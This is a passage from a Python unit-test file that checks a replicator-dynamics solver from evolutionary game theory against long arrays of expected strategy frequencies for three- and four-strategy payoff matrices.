[9.99988898e-01, 1.11015649e-05], [9.99991801e-01, 8.19919968e-06], [9.99993944e-01, 6.05565505e-06], [9.99995527e-01, 4.47259259e-06], [9.99996697e-01, 3.30326369e-06], [9.99997560e-01, 2.43964910e-06], [9.99998198e-01, 1.80194467e-06], [9.99998669e-01, 1.33084681e-06], [9.99999018e-01, 9.82166934e-07], [9.99999275e-01, 7.25194883e-07], [9.99999464e-01, 5.35772717e-07], [9.99999604e-01, 3.96066315e-07], [9.99999707e-01, 2.92673377e-07], [9.99999784e-01, 2.16251201e-07], [9.99999840e-01, 1.59970163e-07], [9.99999882e-01, 1.18489534e-07], [9.99999912e-01, 8.79198227e-08], [9.99999935e-01, 6.47958220e-08], [9.99999952e-01, 4.76360370e-08], [9.99999965e-01, 3.46731961e-08], [9.99999974e-01, 2.55665790e-08], [9.99999981e-01, 1.86146820e-08], [9.99999986e-01, 1.36425118e-08], [9.99999990e-01, 1.00816167e-08], [9.99999992e-01, 7.55059409e-09], [9.99999994e-01, 5.67732943e-09], [9.99999996e-01, 4.28158816e-09], [9.99999997e-01, 3.20976917e-09], [9.99999998e-01, 2.40345206e-09], [9.99999998e-01, 1.78669125e-09], [9.99999999e-01, 1.33286584e-09], [9.99999999e-01, 9.89591714e-10], [9.99999999e-01, 7.40089560e-10], [9.99999999e-01, 5.51209294e-10], [1.00000000e00, 3.28925518e-10], [1.00000000e00, 1.11214696e-10], [1.00000000e00, -7.15664780e-11], [1.00000000e00, -2.19418003e-10], [1.00000000e00, -3.32339878e-10], [1.00000000e00, -4.10332104e-10], [1.00000000e00, -4.53394682e-10], [1.00000000e00, -4.61527610e-10], [9.99999999e-01, -4.34730889e-10], [9.99999999e-01, -3.73004520e-10], [9.99999999e-01, -3.39039249e-10], [9.99999999e-01, -3.64704692e-10], [9.99999999e-01, -3.81253172e-10], [9.99999999e-01, -3.88684691e-10], [9.99999999e-01, -3.86999249e-10], [9.99999999e-01, -3.76196845e-10], [9.99999999e-01, -3.56277479e-10], [9.99999999e-01, -3.27241152e-10], [9.99999999e-01, -2.89087864e-10], [9.99999999e-01, -2.41817614e-10], [9.99999998e-01, -2.02072563e-10], [9.99999998e-01, -1.86998011e-10], [9.99999998e-01, -1.71923460e-10], ] ) xs = replicator_dynamics(timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_game_size_3_example_1(): M = np.array([[3, 2, 3], [4, 1, 1], [2, 3, 1]]) y0 = np.array([0.2, 0.1, 0.7]) timepoints = np.linspace(0, 20, 100) expected_xs_over_time = np.array( [ [0.2, 0.1, 0.7], [0.25084045, 0.09789735, 0.6512622], [0.30680235, 0.096512, 0.59668565], [0.36555987, 0.09596192, 0.53847822], [0.4244435, 0.09636333, 0.47919317], [0.48091315, 0.097819, 0.42126785], [0.53292835, 0.10041113, 0.36666052], [0.57912, 0.10419922, 0.31668078], [0.61877662, 0.10922098, 0.2720024], [0.6517203, 0.11549383, 0.23278586], [0.67814881, 0.12301537, 0.19883582], [0.69849303, 0.13176241, 0.16974455], [0.71330936, 0.14168906, 0.14500158], [0.72320749, 0.15272473, 0.12406778], [0.72880646, 0.16477305, 0.10642048], [0.73070961, 0.17771243, 0.09157796], [0.72949106, 0.19139871, 0.07911023], [0.72568835, 0.2056699, 0.06864175], [0.719798, 0.22035258, 0.05984942], [0.71227239, 0.23526931, 0.0524583], [0.70351757, 0.25024617, 0.04623626], [0.69389181, 0.26511966, 0.04098853], [0.68370534, 0.27974226, 0.03655241], [0.67322108, 0.29398645, 0.03279247], [0.66265685, 0.30774686, 0.02959629], [0.65218849, 0.32094081, 0.0268707], [0.64195385, 0.33350758, 0.02453857], [0.63205732, 0.34540661, 0.02253606], [0.62257449, 0.35661514, 0.02081038], [0.61355672, 0.36712552, 0.01931776], [0.60503556, 0.37694249, 0.01802195], [0.59702658, 0.38608059, 0.01689283], [0.58953289, 0.39456178, 0.01590533], [0.58254803, 0.40241341, 0.01503856], [0.57605847, 0.40966651, 0.01427502], [0.5700456, 0.41635432, 0.01360008], [0.5644874, 0.42251121, 0.01300139], [0.55935967, 0.42817177, 0.01246856], [0.55463707, 0.43337015, 0.01199279], [0.55029384, 0.43813956, 0.0115666], [0.54630443, 0.44251196, 0.01118362], [0.54264384, 0.44651774, 0.01083841], [0.53928799, 0.4501857, 0.01052632], [0.53621383, 0.45354285, 0.01024332], [0.53339955, 0.45661449, 0.00998596], [0.5308246, 0.45942417, 0.00975123], [0.52846971, 0.46199374, 0.00953656], [0.5263169, 0.46434344, 0.00933966], [0.52434948, 0.46649195, 0.00915857], [0.52255195, 0.46845648, 0.00899157], [0.52091, 0.47025287, 0.00883714], [0.51941039, 0.47189566, 0.00869395], [0.51804096, 0.47339821, 0.00856083], [0.51679051, 0.47477274, 0.00843675], [0.51564876, 0.47603045, 0.0083208], [0.51460626, 0.47718159, 0.00821216], [0.51365436, 0.47823552, 0.00811011], [0.51278515, 0.47920082, 0.00801403], [0.51199138, 0.48008529, 0.00792334], [0.5112664, 0.48089607, 0.00783753], [0.51060417, 0.48163968, 0.00775615], [0.50999914, 0.48232207, 0.0076788], [0.50944625, 0.48294864, 0.00760511], [0.50894089, 0.48352435, 0.00753476], [0.50847885, 0.48405369, 0.00746746], [0.50805628, 0.48454077, 0.00740295], [0.50766968, 0.48498934, 0.00734099], [0.50731584, 0.48540279, 0.00728137], [0.50699186, 0.48578424, 0.0072239], [0.50669508, 0.4861365, 0.00716841], [0.50642309, 0.48646217, 0.00711475], [0.50617366, 0.48676357, 0.00706277], [0.50594481, 0.48704285, 0.00701234], [0.50573469, 0.48730195, 0.00696337], [0.50554164, 0.48754263, 0.00691573], [0.50536414, 0.48776652, 0.00686933], [0.50520082, 0.48797508, 0.0068241], [0.5050504, 0.48816965, 0.00677995], [0.50491176, 0.48835143, 0.00673681], [0.50478384, 0.48852154, 0.00669463], [0.50466569, 0.48868099, 0.00665333], [0.50455645, 0.48883068, 0.00661287], [0.50445532, 0.48897146, 0.00657321], [0.50436161, 0.48910409, 0.00653429], [0.50427466, 0.48922926, 0.00649607], [0.50419387, 0.4893476, 0.00645853], [0.5041187, 0.48945968, 0.00642162], [0.50404866, 0.48956602, 0.00638531], [0.50398331, 0.48966711, 0.00634958], [0.50392223, 0.48976337, 0.0063144], [0.50386505, 0.48985519, 0.00627975], [0.50381145, 0.48994295, 0.0062456], [0.50376111, 0.49002695, 0.00621194], [0.50371375, 0.49010751, 0.00617874], [0.50366912, 0.49018489, 0.00614599], [0.50362698, 0.49025935, 0.00611367], [0.50358714, 0.4903311, 0.00608177], [0.50354938, 0.49040035, 0.00605027], [0.50351355, 0.49046729, 0.00601915], [0.50347948, 0.4905321, 0.00598842], ] ) xs = replicator_dynamics(y0=y0, A=M, timepoints=timepoints) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_game_size_3_example_default_timepoints(): M = np.array([[3, 2, 3], [4, 1, 1], [2, 3, 1]]) y0 = np.array([0.2, 0.1, 0.7]) expected_x_1 = np.array([[0.20237066, 0.09988063, 0.69774871]]) expected_x_1000 = np.array([[0.52171238, 0.46937475, 0.00891287]]) xs = replicator_dynamics(y0=y0, A=M) assert np.allclose(xs[1], expected_x_1) assert np.allclose(xs[-1], expected_x_1000) assert len(xs) == 1000 def test_replicator_dynamics_game_size_3_example_2(): M = np.array([[3, 2, 3], [4, 1, 1], [2, 3, 1]]) y0 = np.array([0.5, 0.1, 0.4]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [0.5, 0.1, 0.4], [0.52559968, 0.10135984, 0.37304048], [0.5497745, 0.10301946, 0.34720604], [0.57240754, 0.10498432, 0.32260814], [0.59342086, 0.10725857, 0.29932057], [0.61277116, 0.10984506, 0.27738379], [0.63044466, 0.11274538, 0.25680996], [0.64645211, 0.11595993, 0.23758796], [0.66082391, 0.11948781, 0.21968828], [0.67360575, 0.12332687, 0.20306738], [0.68485481, 0.1274736, 0.18767159], [0.69463657, 0.13192312, 0.17344031], [0.70302219, 0.13666906, 0.16030874], [0.71008648, 0.14170354, 0.14820998], [0.71590619, 0.14701708, 0.13707673], [0.72055883, 0.15259863, 0.12684255], [0.7241217, 0.1584355, 0.1174428], [0.72667121, 0.16451346, 0.10881533], [0.72828236, 0.17081672, 0.10090091], [0.72902836, 0.17732812, 0.09364353], [0.72898035, 0.18402915, 0.08699051], [0.72820721, 0.19090019, 0.08089259], [0.72677541, 0.19792069, 0.0753039], [0.72474884, 0.20506931, 0.07018184], [0.72218875, 0.21232425, 0.06548701], [0.71915361, 0.21966337, 0.06118302], [0.71569909, 0.22706454, 0.05723638], [0.71187792, 0.23450578, 0.05361629], [0.70773992, 0.24196557, 0.0502945], [0.7033319, 0.24942298, 0.04724512], [0.69869765, 0.25685792, 0.04444443], [0.69387795, 0.26425127, 0.04187078], [0.68891058, 0.27158505, 0.03950437], [0.68383036, 0.27884249, 0.03732715], [0.67866917, 0.28600818, 0.03532264], [0.67345609, 0.29306806, 0.03347585], [0.66821741, 0.3000095, 0.03177308], [0.66297682, 0.30682127, 0.03020191], [0.65775544, 0.31349356, 0.02875099], [0.65257204, 0.32001794, 0.02741002], [0.64744309, 0.3263873, 0.02616961], [0.64238298, 0.3325958, 0.02502123], [0.63740411, 0.33863879, 0.0239571], [0.63251708, 0.34451275, 0.02297018], [0.62773079, 0.35021519, 0.02205402], [0.62305263, 0.35574459, 0.02120278], [0.61848858, 0.36110029, 0.02041112], [0.6140434, 0.36628239, 0.01967421], [0.60972067, 0.37129171, 0.01898762], [0.60552299, 0.37612969, 0.01834732], [0.60145203, 0.38079834, 0.01774963], [0.59750868, 0.3853001, 0.01719122], [0.59369315, 0.38963783, 0.01666902], [0.59000503, 0.39381472, 0.01618024], [0.58644338, 0.39783429, 0.01572233], [0.5830068, 0.40170025, 0.01529295], [0.57969351, 0.40541652, 0.01488997], [0.57650141, 0.40898716, 0.01451143], [0.57342812, 0.41241633, 0.01415554], [0.57047106, 0.41570828, 0.01382066], [0.56762744, 0.41886729, 0.01350527], [0.56489435, 0.42189765, 0.01320799], [0.56226876, 0.42480368, 0.01292755], [0.55974758, 0.42758964, 0.01266278], [0.55732765, 0.43025976, 0.01241259], [0.5550058, 0.43281821, 0.01217599], [0.55277882, 0.43526911, 0.01195207], [0.55064354, 0.43761648, 0.01173997], [0.54859681, 0.43986427, 0.01153892], [0.54663548, 0.44201632, 0.0113482], [0.54475648, 0.44407639, 0.01116712], [0.54295678, 0.44604813, 0.01099509], [0.54123342, 0.44793507, 0.01083152], [0.53958348, 0.44974065, 0.01067587], [0.53800412, 0.45146821, 0.01052767], [0.53649261, 0.45312096, 0.01038644], [0.53504623, 0.45470201, 0.01025176], [0.5336624, 0.45621436, 0.01012324], [0.53233858, 0.45766092, 0.0100005], [0.53107233, 0.45904447, 0.0098832], [0.52986128, 0.46036769, 0.00977103], [0.52870314, 0.46163318, 0.00966368], [0.52759571, 0.46284341, 0.00956088], [0.52653686, 0.46400078, 0.00946235], [0.52552454, 0.46510759, 0.00936787], [0.52455677, 0.46616604, 0.0092772], [0.52363164, 0.46717823, 0.00919013], [0.52274734, 0.46814621, 0.00910645], [0.5219021, 0.46907191, 0.00902599], [0.52109424, 0.4699572, 0.00894857], [0.52032212, 0.47080386, 0.00887402], [0.5195842, 0.47161362, 0.00880218], [0.51887898, 0.47238809, 0.00873292], [0.51820503, 0.47312887, 0.0086661], [0.51756097, 0.47383744, 0.00860159], [0.51694549, 0.47451525, 0.00853926], [0.51635732, 0.47516367, 0.00847902], [0.51579525, 0.47578401, 0.00842074], [0.51525813, 0.47637754, 0.00836433], [0.51474485, 0.47694545, 0.0083097], ] ) xs = replicator_dynamics(y0=y0, timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_game_size_3_example_1_default_y0(): M = np.array([[3, 2, 3], [4, 1, 1], [2, 3, 1]]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [0.33333333, 0.33333333, 0.33333333], [0.34828459, 0.3262229, 0.32549251], [0.36315697, 0.31983211, 0.31701092], [0.37787298, 0.31412581, 0.30800121], [0.3923581, 0.30907001, 0.29857189], [0.40654213, 0.30463189, 0.28882598], [0.42036029, 0.30077978, 0.27885992], [0.43375425, 0.29748314, 0.26876261], [0.44667261, 0.29471251, 0.25861488], [0.45907142, 0.29243945, 0.24848913], [0.47091426, 0.29063654, 0.23844919], [0.48217224, 0.2892773, 0.22855046], [0.49282377, 0.28833613, 0.2188401], [0.50285411, 0.28778834, 0.20935755], [0.51225504, 0.28761002, 0.20013494], [0.52102418, 0.28777809, 0.19119773], [0.52916446, 0.28827022, 0.18256531], [0.53668352, 0.28906482, 0.17425166], [0.54359302, 0.29014101, 0.16626597], [0.54990812, 0.2914786, 0.15861327], [0.55564688, 0.2930581, 0.15129501], [0.5608297, 0.29486067, 0.14430963], [0.56547887, 0.29686812, 0.13765301], [0.56961809, 0.29906291, 0.131319], [0.57327211, 0.30142816, 0.12529973], [0.57646634, 0.30394761, 0.11958605], [0.57922655, 0.30660565, 0.1141678], [0.58157859, 0.30938732, 0.1090341], [0.58354816, 0.31227828, 0.10417356], [0.58516064, 0.31526484, 0.09957451], [0.58644089, 0.31833398, 0.09522513], [0.58741312, 0.32147329, 0.09111359], [0.58810078, 0.32467101, 0.08722821], [0.58852649, 0.32791604, 0.08355748], [0.58871195, 0.33119789, 0.08009016], [0.58867791, 0.33450672, 0.07681537], [0.58844412, 0.33783332, 0.07372256], [0.58802931, 0.34116907, 0.07080162], [0.5874512, 0.34450598, 0.06804282], [0.58672648, 0.34783662, 0.0654369], [0.58587083, 0.35115417, 0.06297501], [0.58489893, 0.35445233, 0.06064874], [0.58382451, 0.35772538, 0.05845012], [0.58266033, 0.36096807, 0.05637159], [0.58141828, 0.3641757, 0.05440602], [0.58010932, 0.36734401, 0.05254667], [0.57874361, 0.37046921, 0.05078718], [0.57733051, 0.37354793, 0.04912156], [0.57587859, 0.37657722, 0.04754419], [0.57439572, 0.37955451, 0.04604977], [0.57288908, 0.38247759, 0.04463333], [0.57136522, 0.38534459, 0.04329019], [0.56983008, 0.38815395, 0.04201597], [0.56828904, 0.3909044, 0.04080656], [0.56674693, 0.39359496, 0.03965812], [0.56520812, 0.39622487, 0.03856701], [0.56367651, 0.39879364, 0.03752985], [0.56215558, 0.40130095, 0.03654348], [0.5606484, 0.40374669, 0.03560491], [0.5591577, 0.40613095, 0.03471135], [0.55768587, 0.40845392, 0.03386021], [0.55623498, 0.410716, 0.03304902], [0.55480684, 0.41291766, 0.0322755], [0.55340299, 0.41505951, 0.0315375], [0.55202472, 0.41714228, 0.030833], [0.55067314, 0.41916674, 0.03016012], [0.54934913, 0.42113379, 0.02951708], [0.5480534, 0.42304437, 0.02890223], [0.54678652, 0.42489947, 0.02831401], [0.5455489, 0.42670015, 0.02775096], [0.54434081, 0.42844749, 0.0272117], [0.54316241, 0.43014264, 0.02669495], [0.54201376, 0.43178673, 0.02619951], [0.54089483, 0.43338094, 0.02572423], [0.53980549, 0.43492646, 0.02526805], [0.53874555, 0.43642449, 0.02482996], [0.53771475, 0.43787623, 0.02440903], [0.53671276, 0.43928288, 0.02400436], [0.53573922, 0.44064566, 0.02361512], [0.53479372, 0.44196575, 0.02324053], [0.53387581, 0.44324434, 0.02287984], [0.53298501, 0.44448262, 0.02253237], [0.53212081, 0.44568175, 0.02219745], [0.53128267, 0.44684287, 0.02187446], [0.53047007, 0.44796711, 0.02156282], [0.52968241, 0.4490556, 0.02126199], [0.52891915, 0.45010942, 0.02097143], [0.52817969, 0.45112965, 0.02069066], [0.52746344, 0.45211733, 0.02041923], [0.52676982, 0.4530735, 0.02015668], [0.52609823, 0.45399916, 0.01990261], [0.52544809, 0.45489529, 0.01965662], [0.5248188, 0.45576285, 0.01941835], [0.52420978, 0.45660278, 0.01918744], [0.52362045, 0.45741598, 0.01896357], [0.52305024, 0.45820334, 0.01874642], [0.52249859, 0.45896572, 0.0185357], [0.52196493, 0.45970395, 0.01833112], [0.52144873, 0.46041886, 0.01813241], [0.52094945, 0.46111123, 0.01793933], ] ) xs = replicator_dynamics(timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_game_size_4_example_1(): M = np.array([[3, 2, 4, 2], [5, 1, 1, 3], [6, 2, 3, 2], [1, 3, 4, 7]]) y0 = np.array([0.2, 0.2, 0.5, 0.1]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [2.00000000e-01, 2.00000000e-01, 5.00000000e-01, 1.00000000e-01], [2.03014607e-01, 1.79775683e-01, 5.12598077e-01, 1.04611633e-01], [2.05602634e-01, 1.61119562e-01, 5.24116145e-01, 1.09161659e-01], [2.07780154e-01, 1.44008247e-01, 5.34544791e-01, 1.13666808e-01], [2.09565963e-01, 1.28397079e-01, 5.43887293e-01, 1.18149665e-01], [2.10980399e-01, 1.14224398e-01, 5.52156911e-01, 1.22638292e-01], [2.12044290e-01, 1.01415511e-01, 5.59374243e-01, 1.27165955e-01], [2.12777911e-01, 8.98868138e-02, 5.65564304e-01, 1.31770970e-01], [2.13200213e-01, 7.95489630e-02, 5.70754057e-01, 1.36496767e-01], [2.13328015e-01, 7.03100693e-02, 5.74969767e-01, 1.41392148e-01], [2.13175377e-01, 6.20781199e-02, 5.78234667e-01, 1.46511836e-01], [2.12753003e-01, 5.47629634e-02, 5.80566684e-01, 1.51917349e-01], [2.12067694e-01, 4.82778457e-02, 5.81976254e-01, 1.57678207e-01], [2.11121790e-01, 4.25404241e-02, 5.82464120e-01, 1.63873667e-01], [2.09912560e-01, 3.74735370e-02, 5.82018990e-01, 1.70594913e-01], [2.08431491e-01, 3.30056010e-02, 5.80614947e-01, 1.77947961e-01], [2.06663415e-01, 2.90707653e-02, 5.78208424e-01, 1.86057396e-01], [2.04585400e-01, 2.56088838e-02, 5.74734550e-01, 1.95071166e-01], [2.02165324e-01, 2.25653431e-02, 5.70102601e-01, 2.05166732e-01], [1.99360030e-01, 1.98907774e-02, 5.64190280e-01, 2.16558913e-01], [1.96112947e-01, 1.75407096e-02, 5.56836486e-01, 2.29509857e-01], [1.92351073e-01, 1.54751355e-02, 5.47832225e-01, 2.44341566e-01], [1.87981233e-01, 1.36580686e-02, 5.36909436e-01, 2.61451263e-01], [1.82885632e-01, 1.20570529e-02, 5.23727800e-01, 2.81329515e-01], [1.76917104e-01, 1.06426524e-02, 5.07860610e-01, 3.04579633e-01], [1.69895030e-01, 9.38792086e-03, 4.88782663e-01, 3.31934386e-01], [1.61604457e-01, 8.26788100e-03, 4.65867494e-01, 3.64260168e-01], [1.51803622e-01, 7.25907672e-03, 4.38409213e-01, 4.02528089e-01], [1.40249665e-01, 6.33936318e-03, 4.05697635e-01, 4.47713338e-01], [1.26757836e-01, 5.48826132e-03, 3.67191501e-01, 5.00562402e-01], [1.11310569e-01, 4.68839622e-03, 3.22837907e-01, 5.61163128e-01], [9.42142047e-02, 3.92847992e-03, 2.73531647e-01, 6.28325668e-01], [7.62423767e-02, 3.20736701e-03, 2.21536256e-01, 6.99014000e-01], [5.86232788e-02, 2.53656143e-03, 1.70448974e-01, 7.68391186e-01], [4.27407988e-02, 1.93705559e-03, 1.24328358e-01, 8.30993787e-01], [2.96454250e-02, 1.42958466e-03, 8.62637052e-02, 8.82661285e-01], [1.97150138e-02, 1.02426416e-03, 5.73804221e-02, 9.21880300e-01], [1.26941686e-02, 7.17049061e-04, 3.69516241e-02, 9.49637158e-01], [7.98780274e-03, 4.93669057e-04, 2.32539272e-02, 9.68264601e-01], [4.94920545e-03, 3.36053575e-04, 1.44088459e-02, 9.80305895e-01], [3.03598214e-03, 2.27083826e-04, 8.83910216e-03, 9.87897832e-01], [1.85064498e-03, 1.52736531e-04, 5.38817086e-03, 9.92608448e-01], [1.12369181e-03, 1.02433840e-04, 3.27168224e-03, 9.95502192e-01], [6.80655561e-04, 6.85759243e-05, 1.98177675e-03, 9.97268992e-01], [4.11689813e-04, 4.58593611e-05, 1.19866970e-03, 9.98343781e-01], [2.48785662e-04, 3.06476572e-05, 7.24362584e-04, 9.98996204e-01], [1.50260753e-04, 2.04735127e-05, 4.37498917e-04, 9.99391767e-01], [9.07242335e-05, 1.36735679e-05, 2.64152780e-04, 9.99631449e-01], [5.47664709e-05, 9.13076963e-06, 1.59458220e-04, 9.99776645e-01], [3.30562786e-05, 6.09669114e-06, 9.62467961e-05, 9.99864600e-01], [1.99507373e-05, 4.07058812e-06, 5.80886620e-05, 9.99917890e-01], [1.20411070e-05, 2.71775634e-06, 3.50589495e-05, 9.99950182e-01], [7.26674553e-06, 1.81448136e-06, 2.11578956e-05, 9.99969761e-01], [4.38544006e-06, 1.21140807e-06, 1.27686717e-05, 9.99981634e-01], [2.64635182e-06, 8.08751772e-07, 7.70513293e-06, 9.99988840e-01], [1.59658805e-06, 5.39894155e-07, 4.64863489e-06, 9.99993215e-01], [9.63663665e-07, 3.60440823e-07, 2.80580866e-06, 9.99995870e-01], [5.81458028e-07, 2.40616233e-07, 1.69297654e-06, 9.99997485e-01], [3.50999339e-07, 1.60627592e-07, 1.02197170e-06, 9.99998466e-01], [2.12105795e-07, 1.07247667e-07, 6.17568459e-07, 9.99999063e-01], [1.28067075e-07, 7.16010679e-08, 3.72880837e-07, 9.99999427e-01], [7.73743336e-08, 4.78056299e-08, 2.25283557e-07, 9.99999650e-01], [4.68788643e-08, 3.19497919e-08, 1.36492772e-07, 9.99999785e-01], [2.84194486e-08, 2.13634439e-08, 8.27462311e-08, 9.99999867e-01], [1.70359632e-08, 1.42530879e-08, 4.96020091e-08, 9.99999919e-01], [1.01359124e-08, 9.49314320e-09, 2.95117812e-08, 9.99999951e-01], [6.01592329e-09, 6.30408466e-09, 1.75159971e-08, 9.99999970e-01], [3.60293196e-09, 4.18726641e-09, 1.04903175e-08, 9.99999982e-01], [2.21909257e-09, 2.79929916e-09, 6.46112278e-09, 9.99999989e-01], [1.38252426e-09, 1.87597724e-09, 4.02536563e-09, 9.99999993e-01], [8.55072319e-10, 1.25591890e-09, 2.48963351e-09, 9.99999995e-01], [5.23161237e-10, 8.39645178e-10, 1.52323929e-09, 9.99999997e-01], [3.19635397e-10, 5.61528892e-10, 9.30652271e-10, 9.99999998e-01], [1.96274641e-10, 3.75788327e-10, 5.71474380e-10, 9.99999999e-01], [7.90089904e-11, 2.01486586e-10, 2.30043033e-10, 9.99999999e-01], [-2.75223088e-11, 4.43008850e-11, -8.01341155e-11, 1.00000000e00], [-1.02459537e-10, -7.11494645e-11, -2.98321786e-10, 1.00000000e00], [-1.45802696e-10, -1.44864462e-10, -4.24519978e-10, 1.00000000e00], [-1.57551783e-10, -1.76844109e-10, -4.58728693e-10, 1.00000000e00], [-1.37706801e-10, -1.67088404e-10, -4.00947928e-10, 1.00000000e00], [-1.15830837e-10, -1.52277395e-10, -3.37253748e-10, 1.00000000e00], [-1.27082255e-10, -1.76033398e-10, -3.70013445e-10, 1.00000000e00], [-1.30203828e-10, -1.87167004e-10, -3.79102236e-10, 9.99999999e-01], [-1.25195555e-10, -1.85678212e-10, -3.64520121e-10, 9.99999999e-01], [-1.12057437e-10, -1.71567024e-10, -3.26267100e-10, 9.99999999e-01], [-9.07894722e-11, -1.44833438e-10, -2.64343172e-10, 9.99999999e-01], [-6.58177915e-11, -1.29826786e-10, -1.91635490e-10, 9.99999998e-01], [-5.77524326e-11, -1.14827540e-10, -1.68152342e-10, 9.99999999e-01], [-4.96870738e-11, -9.98282933e-11, -1.44669194e-10, 9.99999999e-01], [-4.16217149e-11, -8.48290467e-11, -1.21186046e-10, 9.99999999e-01], [-3.35563561e-11, -6.98298001e-11, -9.77028982e-11, 9.99999999e-01], [-2.54909973e-11, -5.48305535e-11, -7.42197503e-11, 9.99999999e-01], [-1.74256384e-11, -3.98313069e-11, -5.07366023e-11, 9.99999999e-01], [-1.56239261e-11, -3.63303742e-11, -4.54907255e-11, 9.99999999e-01], [-1.52023171e-11, -3.53629278e-11, -4.42631659e-11, 9.99999999e-01], [-1.47807080e-11, -3.43954813e-11, -4.30356063e-11, 9.99999999e-01], [-1.43590990e-11, -3.34280348e-11, -4.18080466e-11, 9.99999999e-01], [-1.39374900e-11, -3.24605883e-11, -4.05804870e-11, 9.99999999e-01], [-1.35158810e-11, -3.14931418e-11, -3.93529274e-11, 9.99999999e-01], [-1.30942720e-11, -3.05256954e-11, -3.81253678e-11, 9.99999999e-01], ] ) xs = replicator_dynamics(y0=y0, timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_game_size_4_example_2(): M = np.array([[3, 2, 4, 2], [5, 1, 1, 3], [6, 2, 3, 2], [1, 3, 4, 7]]) y0 = np.array([0.6, 0.1, 0.2, 0.1]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [6.00000000e-01, 1.00000000e-01, 2.00000000e-01, 1.00000000e-01], [5.80420179e-01, 1.02112104e-01, 2.26438063e-01, 9.10296545e-02], [5.60703224e-01, 1.02764556e-01, 2.53803256e-01, 8.27289637e-02], [5.41167086e-01, 1.01977465e-01, 2.81742410e-01, 7.51130396e-02], [5.22074545e-01, 9.98438659e-02, 3.09908715e-01, 6.81728742e-02], [5.03628230e-01, 9.65147322e-02, 3.37975461e-01, 6.18815768e-02], [4.85972882e-01, 9.21809929e-02, 3.65645769e-01, 5.62003554e-02], [4.69202136e-01, 8.70552790e-02, 3.92658949e-01, 5.10836358e-02], [4.53367471e-01, 8.13554217e-02, 4.18794068e-01, 4.64830393e-02], [4.38487551e-01, 7.52909495e-02, 4.43871296e-01, 4.23502030e-02], [4.24556757e-01, 6.90530159e-02, 4.67751586e-01, 3.86386415e-02], [4.11552390e-01, 6.28078193e-02, 4.90334955e-01, 3.53048365e-02], [3.99440406e-01, 5.66931176e-02, 5.11557695e-01, 3.23087817e-02], [3.88179692e-01, 5.08174781e-02, 5.31388695e-01, 2.96141349e-02], [3.77725273e-01, 4.52612790e-02, 5.49825265e-01, 2.71881840e-02], [3.68030476e-01, 4.00793316e-02, 5.66888559e-01, 2.50016336e-02], [3.59048444e-01, 3.53042210e-02, 5.82618984e-01, 2.30283506e-02], [3.50733127e-01, 3.09500459e-02, 5.97071747e-01, 2.12450802e-02], [3.43039913e-01, 2.70161764e-02, 6.10312748e-01, 1.96311622e-02], [3.35926019e-01, 2.34907933e-02, 6.22414927e-01, 1.81682605e-02], [3.29350717e-01, 2.03540183e-02, 6.33455151e-01, 1.68401144e-02], [3.23275448e-01, 1.75806009e-02, 6.43511642e-01, 1.56323094e-02], [3.17663866e-01, 1.51421124e-02, 6.52661949e-01, 1.45320720e-02], [3.12481831e-01, 1.30086774e-02, 6.60981407e-01, 1.35280845e-02], [3.07697368e-01, 1.11502875e-02, 6.68542025e-01, 1.26103192e-02], [3.03280608e-01, 9.53775700e-03, 6.75411745e-01, 1.17698907e-02], [2.99203707e-01, 8.14336365e-03, 6.81654005e-01, 1.09989243e-02], [2.95440763e-01, 6.94128233e-03, 6.87327517e-01, 1.02904379e-02], [2.91967717e-01, 5.90780631e-03, 6.92486238e-01, 9.63823834e-03], [2.88762258e-01, 5.02143667e-03, 6.97179477e-01, 9.03682838e-03], [2.85803721e-01, 4.26287314e-03, 7.01452081e-01, 8.48132511e-03], [2.83072986e-01, 3.61493852e-03, 7.05344689e-01, 7.96738728e-03], [2.80552380e-01, 3.06245306e-03, 7.08894015e-01, 7.49115128e-03], [2.78225583e-01, 2.59208318e-03, 7.12133159e-01, 7.04917476e-03], [2.76077528e-01, 2.19217981e-03, 7.15091905e-01, 6.63838682e-03], [2.74094319e-01, 1.85260717e-03, 7.17797029e-01, 6.25604450e-03], [2.72263140e-01, 1.56458788e-03, 7.20272578e-01, 5.89969385e-03], [2.70572180e-01, 1.32054238e-03, 7.22540141e-01, 5.56713642e-03], [2.69010552e-01, 1.11394543e-03, 7.24619103e-01, 5.25639953e-03], [2.67568225e-01, 9.39195127e-04, 7.26526869e-01, 4.96571001e-03], [2.66235959e-01, 7.91492823e-04, 7.28279077e-01, 4.69347140e-03], [2.65005238e-01, 6.66737179e-04, 7.29889781e-01, 4.43824386e-03], [2.63868220e-01, 5.61428279e-04, 7.31371625e-01, 4.19872636e-03], [2.62817677e-01, 4.72584699e-04, 7.32735997e-01, 3.97374121e-03], [2.61846950e-01, 3.97670564e-04, 7.33993159e-01, 3.76222045e-03], [2.60949904e-01, 3.34531655e-04, 7.35152371e-01, 3.56319374e-03], [2.60120883e-01, 2.81339801e-04, 7.36222000e-01, 3.37577783e-03], [2.59354674e-01, 2.36545608e-04, 7.37209613e-01, 3.19916730e-03], [2.58646473e-01, 1.98836743e-04, 7.38122064e-01, 3.03262621e-03], [2.57991847e-01, 1.67102937e-04, 7.38965569e-01, 2.87548099e-03], [2.57386712e-01, 1.40406606e-04, 7.39745767e-01, 2.72711416e-03], [2.56827297e-01, 1.17953508e-04, 7.40467791e-01, 2.58695819e-03], [2.56310127e-01, 9.90745170e-05, 7.41136308e-01, 2.45449105e-03], [2.55831991e-01, 8.32032628e-05, 7.41755574e-01, 2.32923122e-03], [2.55389930e-01, 6.98644087e-05, 7.42329471e-01, 2.21073444e-03], [2.54981210e-01, 5.86559924e-05, 7.42861544e-01, 2.09858959e-03], [2.54603308e-01, 4.92394766e-05, 7.43355037e-01, 1.99241593e-03], [2.54253894e-01, 4.13300061e-05, 7.43812916e-01, 1.89186027e-03], [2.53930817e-01, 3.46872608e-05, 7.44237902e-01, 1.79659435e-03], [2.53632090e-01, 2.91099509e-05, 7.44632487e-01, 1.70631297e-03], [2.53355875e-01, 2.44261534e-05, 7.44998968e-01, 1.62073123e-03], 